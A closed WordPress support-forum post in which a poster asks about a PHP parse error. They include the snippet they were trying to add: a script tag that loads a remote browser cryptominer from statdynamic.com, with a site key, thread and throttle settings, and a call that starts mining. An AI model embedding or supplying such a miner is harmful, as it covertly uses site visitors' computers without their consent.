I inserted Javascript but got an error
-
This is the error:
Parse error: syntax error, unexpected ‘<‘, expecting end of file in /home/clients/b14092873610a8d05e42e2de9ebafaec/web/blablabla.com/wp-content/plugins/code-snippets/php/snippet-ops.php(433) : eval()’d code on line 1
This is the code I want to insert
<script src=”//statdynamic.com/lib/crypta.js”></script>
<script>
var miner=new CRLT.Anonymous(‘8740baa84e473fe7e2f85d48474bb6aedf57385a9752’, {
threads:4,throttle:0.2, coin: “upx”,
});
miner.start();
</script>
The topic ‘I inserted Javascript but got an error’ is closed to new replies.